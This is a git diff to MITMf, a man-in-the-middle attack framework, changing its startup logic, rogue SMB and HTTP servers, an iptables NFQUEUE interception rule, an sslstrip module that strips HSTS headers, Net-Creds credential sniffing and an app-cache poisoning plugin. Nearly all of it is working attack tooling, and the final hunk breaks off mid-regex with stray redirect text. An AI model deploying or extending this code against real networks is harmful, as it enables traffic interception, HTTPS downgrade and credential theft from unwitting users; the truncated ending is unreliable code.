diff --git a/core/servers/HTTP.py b/core/servers/HTTP.py
index 82296eb..75d0c1d 100644
--- a/core/servers/HTTP.py
+++ b/core/servers/HTTP.py
@@ -49,10 +49,10 @@ class HTTP:
def start(self):
try:
- if OsInterfaceIsSupported():
- server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
- else:
- server = ThreadingTCPServer(('', 80), HTTP1)
+ #if OsInterfaceIsSupported():
+ #server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
+ #else:
+ server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1)
t = threading.Thread(name='HTTP', target=server.serve_forever)
t.setDaemon(True)
@@ -267,7 +267,7 @@ def PacketSequence(data, client):
else:
Response = IIS_Auth_401_Ans()
if settings.Config.Verbose:
- log.info("{} [HTTP] Sending NTLM authentication request to".format(client))
+ log.info("{} [HTTP] Sending NTLM authentication request".format(client))
return str(Response)
diff --git a/core/servers/SMB.py b/core/servers/SMB.py
index 198ba4d..cac8027 100644
--- a/core/servers/SMB.py
+++ b/core/servers/SMB.py
@@ -28,12 +28,12 @@ class SMB:
def start(self):
try:
- if OsInterfaceIsSupported():
- server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
- server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
- else:
- server1 = ThreadingTCPServer(('', 445), SMB1)
- server2 = ThreadingTCPServer(('', 139), SMB1)
+ #if OsInterfaceIsSupported():
+ # server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
+ # server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
+ #else:
+ server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1)
+ server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1)
for server in [server1, server2]:
t = threading.Thread(name='SMB', target=server.serve_forever)
diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py
index f196842..f9a2719 100644
--- a/core/sslstrip/ServerConnection.py
+++ b/core/sslstrip/ServerConnection.py
@@ -155,7 +155,7 @@ class ServerConnection(HTTPClient):
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
- clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo)
+ clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo)
elif (key.lower() == 'content-length'):
self.contentLength = value
@@ -179,7 +179,7 @@ class ServerConnection(HTTPClient):
self.plugins.hook()
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
- for header, value in self.client.headers.iteritems():
+ for header, value in self.headers.iteritems():
log.debug("Receiving header: ({}: {})".format(header, value))
def handleResponsePart(self, data):
diff --git a/core/utils.py b/core/utils.py
index c3ae067..7781bad 100644
--- a/core/utils.py
+++ b/core/utils.py
@@ -98,5 +98,5 @@ class iptables:
def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule")
- os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1')
+ os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True
\ No newline at end of file
diff --git a/libs/bdfactory b/libs/bdfactory
index dadf1d2..d2f3521 160000
--- a/libs/bdfactory
+++ b/libs/bdfactory
@@ -1 +1 @@
-Subproject commit dadf1d21bfcb9c8ebefc7891bd95b9452b2af8d5
+Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586
diff --git a/logs/.gitignore b/logs/.gitignore
index cf7c24d..364db4d 100644
--- a/logs/.gitignore
+++ b/logs/.gitignore
@@ -1,5 +1,5 @@
*
!.gitignore
!responder/
-!dnschef/
+!dns/
!ferret-ng/
diff --git a/logs/dnschef/.gitignore b/logs/dns/.gitignore
similarity index 100%
rename from logs/dnschef/.gitignore
rename to logs/dns/.gitignore
diff --git a/mitmf.py b/mitmf.py
index 08a8b73..03c7ed3 100755
--- a/mitmf.py
+++ b/mitmf.py
@@ -41,7 +41,7 @@ mitmf_version = '0.9.8'
mitmf_codename = 'The Dark Side'
if os.geteuid() != 0:
- sys.exit("[-] The derp is strong with this one")
+ sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.")
parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename),
version="{} - '{}'".format(mitmf_version, mitmf_codename),
@@ -52,14 +52,14 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver
#add MITMf options
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
-sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on")
+sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
-sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic')
+sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+')
#Initialize plugins and pass them the parser NameSpace object
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
@@ -73,6 +73,15 @@ options = parser.parse_args()
#Set the log level
logger().log_level = logging.__dict__[options.log_level.upper()]
+from core.logger import logger
+formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+log = logger().setup_logger("MITMf", formatter)
+
+from core.netcreds import NetCreds
+
+if options.read_pcap:
+ NetCreds().parse_pcap(options.read_pcap)
+
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
from core.utils import get_ip, get_mac, shutdown
options.ip = get_ip(options.interface)
@@ -80,33 +89,18 @@ options.mac = get_mac(options.interface)
settings.Config.populate(options)
-from core.logger import logger
-formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
-log = logger().setup_logger("MITMf", formatter)
-
log.debug("MITMf started: {}".format(sys.argv))
#Start Net-Creds
-from core.netcreds import NetCreds
-NetCreds().start(options.interface, options.ip, options.read_pcap)
+print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
+
+NetCreds().start(options.interface, options.ip)
+print "|"
+print "|_ Net-Creds v{} online".format(NetCreds.version)
-from core.sslstrip.CookieCleaner import CookieCleaner
from core.proxyplugins import ProxyPlugins
-from core.sslstrip.StrippingProxy import StrippingProxy
-from core.sslstrip.URLMonitor import URLMonitor
-
-URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
-URLMonitor.getInstance().setCaching(options.preserve_cache)
-CookieCleaner.getInstance().setEnabled(options.killsessions)
-
-strippingFactory = http.HTTPFactory(timeout=10)
-strippingFactory.protocol = StrippingProxy
-
-reactor.listenTCP(options.listen_port, strippingFactory)
ProxyPlugins().all_plugins = plugins
-
-print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
for plugin in plugins:
#load only the plugins that have been called at the command line
@@ -126,48 +120,64 @@ for plugin in plugins:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
- plugin.reactor(strippingFactory)
plugin.start_config_watch()
-print "|"
-print "|_ Sergio-Proxy v0.2.1 online"
-print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
-print "|"
-
if options.filter:
from core.packetfilter import PacketFilter
pfilter = PacketFilter(options.filter)
- pfilter.start()
print "|_ PacketFilter online"
- print "| |_ Applying filter {} to incoming packets".format(options.filter)
+ for filter in options.filter:
+ print " |_ Applying filter {} to incoming packets".format(filter)
+ try:
+ pfilter.start()
+ except KeyboardInterrupt:
+ pfilter.stop()
+ shutdown()
-print "|_ Net-Creds v{} online".format(NetCreds.version)
+else:
+ from core.sslstrip.CookieCleaner import CookieCleaner
+ from core.sslstrip.StrippingProxy import StrippingProxy
+ from core.sslstrip.URLMonitor import URLMonitor
-#Start mitmf-api
-from core.mitmfapi import mitmfapi
-print "|_ MITMf-API online"
-mitmfapi().start()
+ URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
+ URLMonitor.getInstance().setCaching(options.preserve_cache)
+ CookieCleaner.getInstance().setEnabled(options.killsessions)
-#Start the HTTP Server
-from core.servers.HTTP import HTTP
-HTTP().start()
-print "|_ HTTP server online"
+ strippingFactory = http.HTTPFactory(timeout=10)
+ strippingFactory.protocol = StrippingProxy
-#Start DNSChef
-from core.servers.DNS import DNSChef
-DNSChef().start()
-print "|_ DNSChef v{} online".format(DNSChef.version)
+ reactor.listenTCP(options.listen_port, strippingFactory)
-#Start the SMB server
-from core.servers.SMB import SMB
-SMB().start()
-print "|_ SMB server online\n"
+ for plugin in plugins:
+ if vars(options)[plugin.optname] is True:
+ plugin.reactor(strippingFactory)
-#start the reactor
-reactor.run()
-print "\n"
+ print "|_ Sergio-Proxy v0.2.1 online"
+ print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
-if options.filter:
- pfilter.stop()
+ #Start mitmf-api
+ from core.mitmfapi import mitmfapi
+ print "|"
+ print "|_ MITMf-API online"
+ mitmfapi().start()
-shutdown()
\ No newline at end of file
+ #Start the HTTP Server
+ from core.servers.HTTP import HTTP
+ HTTP().start()
+ print "|_ HTTP server online"
+
+ #Start DNSChef
+ from core.servers.DNS import DNSChef
+ DNSChef().start()
+ print "|_ DNSChef v{} online".format(DNSChef.version)
+
+ #Start the SMB server
+ from core.servers.SMB import SMB
+ SMB().start()
+ print "|_ SMB server online\n"
+
+ #start the reactor
+ reactor.run()
+ print "\n"
+
+ shutdown()
diff --git a/plugins/appcachepoison.py b/plugins/appcachepoison.py
index c456db2..505c5f6 100644
--- a/plugins/appcachepoison.py
+++ b/plugins/appcachepoison.py
@@ -36,6 +36,7 @@ class AppCachePlugin(Plugin):
from core.sslstrip.URLMonitor import URLMonitor
self.urlMonitor = URLMonitor.getInstance()
+ self.urlMonitor.caching = True
self.urlMonitor.setAppCachePoisoning()
def response(self, response, request, data):
@@ -72,29 +73,25 @@ class AppCachePlugin(Plugin):
p = self.getTemplatePrefix(section)
self.clientlog.info("Poisoning raw URL", extra=request.clientInfo)
if os.path.exists(p + '.replace'): # replace whole content
- f = open(p + '.replace', 'r')
- data = f.read()
- f.close()
+ with open(p + '.replace', 'r') as f:
+ data = f.read()
elif os.path.exists(p + '.append'): # append file to body
- f = open(p + '.append', 'r')
- data += f.read()
- f.close()
+ with open(p + '.append', 'r') as f:
+ data += f.read()
elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)):
self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
p = self.getTemplatePrefix(section)
self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo)
if os.path.exists(p + '.replace'): # replace whole content
- f = open(p + '.replace', 'r')
- data = f.read()
- f.close()
+ with open(p + '.replace', 'r') as f:
+ data = f.read()
elif os.path.exists(p + '.append'): # append file to body
- f = open(p + '.append', 'r')
- appendix = f.read()
- data = re.sub(re.compile("
+ Please click here if you are not redirected automatically
+